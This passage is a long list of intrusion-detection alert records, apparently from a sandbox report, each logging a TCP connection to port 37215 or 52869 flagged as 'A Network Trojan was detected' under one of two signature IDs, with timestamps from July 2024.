                      Source Port:36698
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.256224+0200
                      SID:2027339
                      Source Port:44056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.097709+0200
                      SID:2835222
                      Source Port:58124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.656262+0200
                      SID:2835222
                      Source Port:51062
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.608485+0200
                      SID:2835222
                      Source Port:60150
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.165064+0200
                      SID:2027339
                      Source Port:45798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.648489+0200
                      SID:2835222
                      Source Port:41366
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.275869+0200
                      SID:2835222
                      Source Port:41340
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.857203+0200
                      SID:2027339
                      Source Port:33600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.295477+0200
                      SID:2027339
                      Source Port:36392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.219743+0200
                      SID:2835222
                      Source Port:39268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.596514+0200
                      SID:2835222
                      Source Port:50028
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.231934+0200
                      SID:2027339
                      Source Port:38630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.322750+0200
                      SID:2835222
                      Source Port:43176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.055028+0200
                      SID:2027339
                      Source Port:54640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.596514+0200
                      SID:2835222
                      Source Port:58602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.044874+0200
                      SID:2027339
                      Source Port:40138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658630+0200
                      SID:2835222
                      Source Port:49618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.018478+0200
                      SID:2027339
                      Source Port:52026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.238159+0200
                      SID:2835222
                      Source Port:38176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.657714+0200
                      SID:2835222
                      Source Port:59906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.377460+0200
                      SID:2835222
                      Source Port:37826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.180872+0200
                      SID:2835222
                      Source Port:59710
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.518128+0200
                      SID:2027339
                      Source Port:55040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.203029+0200
                      SID:2835222
                      Source Port:50406
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.264733+0200
                      SID:2027339
                      Source Port:60300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.554405+0200
                      SID:2027339
                      Source Port:44736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.649623+0200
                      SID:2835222
                      Source Port:45164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.248248+0200
                      SID:2835222
                      Source Port:44014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.171002+0200
                      SID:2835222
                      Source Port:49226
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.657714+0200
                      SID:2835222
                      Source Port:51926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.273032+0200
                      SID:2027339
                      Source Port:56040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.170218+0200
                      SID:2835222
                      Source Port:57256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.661486+0200
                      SID:2835222
                      Source Port:38614
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.175742+0200
                      SID:2835222
                      Source Port:52752
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.236479+0200
                      SID:2835222
                      Source Port:46326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.008960+0200
                      SID:2027339
                      Source Port:54890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.095698+0200
                      SID:2835222
                      Source Port:60312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.233814+0200
                      SID:2835222
                      Source Port:56890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.065712+0200
                      SID:2835222
                      Source Port:49936
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.223718+0200
                      SID:2835222
                      Source Port:43956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.108705+0200
                      SID:2835222
                      Source Port:37118
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.842102+0200
                      SID:2027339
                      Source Port:57978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.845427+0200
                      SID:2027339
                      Source Port:42530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.208769+0200
                      SID:2835222
                      Source Port:42824
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.811438+0200
                      SID:2027339
                      Source Port:44282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.171003+0200
                      SID:2835222
                      Source Port:34534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.436844+0200
                      SID:2835222
                      Source Port:47684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.570296+0200
                      SID:2835222
                      Source Port:34142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.180699+0200
                      SID:2835222
                      Source Port:43154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.670288+0200
                      SID:2835222
                      Source Port:44792
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.188401+0200
                      SID:2027339
                      Source Port:47786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.180699+0200
                      SID:2835222
                      Source Port:52552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:24.431186+0200
                      SID:2835222
                      Source Port:57400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.651026+0200
                      SID:2835222
                      Source Port:34184
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.182814+0200
                      SID:2027339
                      Source Port:50626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.243581+0200
                      SID:2027339
                      Source Port:44870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.021221+0200
                      SID:2027339
                      Source Port:49184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.137445+0200
                      SID:2835222
                      Source Port:57738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.294700+0200
                      SID:2835222
                      Source Port:57930
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.508899+0200
                      SID:2835222
                      Source Port:36788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.578437+0200
                      SID:2027339
                      Source Port:46728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.819226+0200
                      SID:2027339
                      Source Port:33560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.798173+0200
                      SID:2027339
                      Source Port:57210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.860262+0200
                      SID:2027339
                      Source Port:53182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.565676+0200
                      SID:2027339
                      Source Port:41022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.181164+0200
                      SID:2835222
                      Source Port:35840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.245434+0200
                      SID:2835222
                      Source Port:42510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.523287+0200
                      SID:2835222
                      Source Port:41550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.219743+0200
                      SID:2835222
                      Source Port:48984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.035713+0200
                      SID:2027339
                      Source Port:36278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.552023+0200
                      SID:2027339
                      Source Port:42150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:08.864629+0200
                      SID:2027339
                      Source Port:40650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.506605+0200
                      SID:2027339
                      Source Port:45268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658201+0200
                      SID:2835222
                      Source Port:42260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.181164+0200
                      SID:2835222
                      Source Port:48142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.201033+0200
                      SID:2835222
                      Source Port:33894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.170219+0200
                      SID:2835222
                      Source Port:33262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.600721+0200
                      SID:2835222
                      Source Port:55928
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.490939+0200
                      SID:2835222
                      Source Port:36512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.283272+0200
                      SID:2027339
                      Source Port:49550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.842450+0200
                      SID:2027339
                      Source Port:49320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.821142+0200
                      SID:2027339
                      Source Port:57764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.660317+0200
                      SID:2835222
                      Source Port:46822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.066021+0200
                      SID:2835222
                      Source Port:35414
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.288852+0200
                      SID:2835222
                      Source Port:34064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.662825+0200
                      SID:2835222
                      Source Port:35058
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.997029+0200
                      SID:2027339
                      Source Port:40778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.657714+0200
                      SID:2835222
                      Source Port:56940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.515296+0200
                      SID:2027339
                      Source Port:34136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.230051+0200
                      SID:2027339
                      Source Port:54884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.297208+0200
                      SID:2027339
                      Source Port:58602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.067656+0200
                      SID:2835222
                      Source Port:42784
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:05.273692+0200
                      SID:2027339
                      Source Port:35296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.397835+0200
                      SID:2835222
                      Source Port:33418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.452762+0200
                      SID:2027339
                      Source Port:58878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.649623+0200
                      SID:2835222
                      Source Port:60674
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.348834+0200
                      SID:2027339
                      Source Port:51954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.605490+0200
                      SID:2835222
                      Source Port:39392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.119631+0200
                      SID:2835222
                      Source Port:49164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658630+0200
                      SID:2835222
                      Source Port:34962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.180699+0200
                      SID:2835222
                      Source Port:45012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.662825+0200
                      SID:2835222
                      Source Port:60584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.206624+0200
                      SID:2027339
                      Source Port:53640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.164966+0200
                      SID:2835222
                      Source Port:53440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.223718+0200
                      SID:2835222
                      Source Port:44694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.213565+0200
                      SID:2835222
                      Source Port:57408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.661486+0200
                      SID:2835222
                      Source Port:46260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.206164+0200
                      SID:2835222
                      Source Port:60616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.171003+0200
                      SID:2835222
                      Source Port:52842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.648489+0200
                      SID:2835222
                      Source Port:42434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.648489+0200
                      SID:2835222
                      Source Port:41068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658298+0200
                      SID:2835222
                      Source Port:42978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.185305+0200
                      SID:2835222
                      Source Port:55948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.173231+0200
                      SID:2027339
                      Source Port:43928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.083467+0200
                      SID:2835222
                      Source Port:36256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.657714+0200
                      SID:2835222
                      Source Port:54302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:14.013297+0200
                      SID:2835222
                      Source Port:42414
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.202996+0200
                      SID:2835222
                      Source Port:38768
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.652845+0200
                      SID:2835222
                      Source Port:34864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.263044+0200
                      SID:2835222
                      Source Port:41094
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.321782+0200
                      SID:2027339
                      Source Port:43644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:25.731945+0200
                      SID:2027339
                      Source Port:57276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.648489+0200
                      SID:2835222
                      Source Port:39114
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.287563+0200
                      SID:2027339
                      Source Port:55498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658298+0200
                      SID:2835222
                      Source Port:53980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.227280+0200
                      SID:2835222
                      Source Port:59050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.230536+0200
                      SID:2027339
                      Source Port:46338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.218459+0200
                      SID:2835222
                      Source Port:47260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.088869+0200
                      SID:2835222
                      Source Port:42854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.294530+0200
                      SID:2835222
                      Source Port:47068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.592314+0200
                      SID:2027339
                      Source Port:44408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.017864+0200
                      SID:2027339
                      Source Port:43378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.166592+0200
                      SID:2027339
                      Source Port:57142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.209396+0200
                      SID:2027339
                      Source Port:33924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.354087+0200
                      SID:2027339
                      Source Port:51150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.648916+0200
                      SID:2835222
                      Source Port:47392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658298+0200
                      SID:2835222
                      Source Port:50384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.182200+0200
                      SID:2027339
                      Source Port:37504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.011580+0200
                      SID:2027339
                      Source Port:48472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.620060+0200
                      SID:2027339
                      Source Port:43584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.098963+0200
                      SID:2835222
                      Source Port:60660
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.782825+0200
                      SID:2027339
                      Source Port:37678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.529672+0200
                      SID:2027339
                      Source Port:41332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.180699+0200
                      SID:2835222
                      Source Port:37038
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.373821+0200
                      SID:2835222
                      Source Port:49974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.397150+0200
                      SID:2835222
                      Source Port:52232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.514803+0200
                      SID:2835222
                      Source Port:57796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.487846+0200
                      SID:2027339
                      Source Port:43862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.021221+0200
                      SID:2027339
                      Source Port:59966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.032669+0200
                      SID:2027339
                      Source Port:54312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.422111+0200
                      SID:2835222
                      Source Port:55506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.171003+0200
                      SID:2835222
                      Source Port:52632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.307476+0200
                      SID:2027339
                      Source Port:42464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.499297+0200
                      SID:2027339
                      Source Port:43978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.654988+0200
                      SID:2835222
                      Source Port:34066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.405069+0200
                      SID:2835222
                      Source Port:36746
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.996287+0200
                      SID:2027339
                      Source Port:33494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.279589+0200
                      SID:2027339
                      Source Port:44986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.240867+0200
                      SID:2027339
                      Source Port:36012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.233858+0200
                      SID:2027339
                      Source Port:60488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.213565+0200
                      SID:2835222
                      Source Port:47064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.267601+0200
                      SID:2027339
                      Source Port:42544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.372914+0200
                      SID:2027339
                      Source Port:60772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.058270+0200
                      SID:2027339
                      Source Port:54394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.841200+0200
                      SID:2835222
                      Source Port:42912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.357609+0200
                      SID:2027339
                      Source Port:35646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.163619+0200
                      SID:2835222
                      Source Port:33028
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.268418+0200
                      SID:2027339
                      Source Port:53670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.851927+0200
                      SID:2027339
                      Source Port:47262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.892196+0200
                      SID:2835222
                      Source Port:46508
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.201033+0200
                      SID:2835222
                      Source Port:34208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.227554+0200
                      SID:2835222
                      Source Port:43088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.461356+0200
                      SID:2027339
                      Source Port:52432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.372044+0200
                      SID:2027339
                      Source Port:35746
                      Destination Port:52869
                      Protocol:TCP
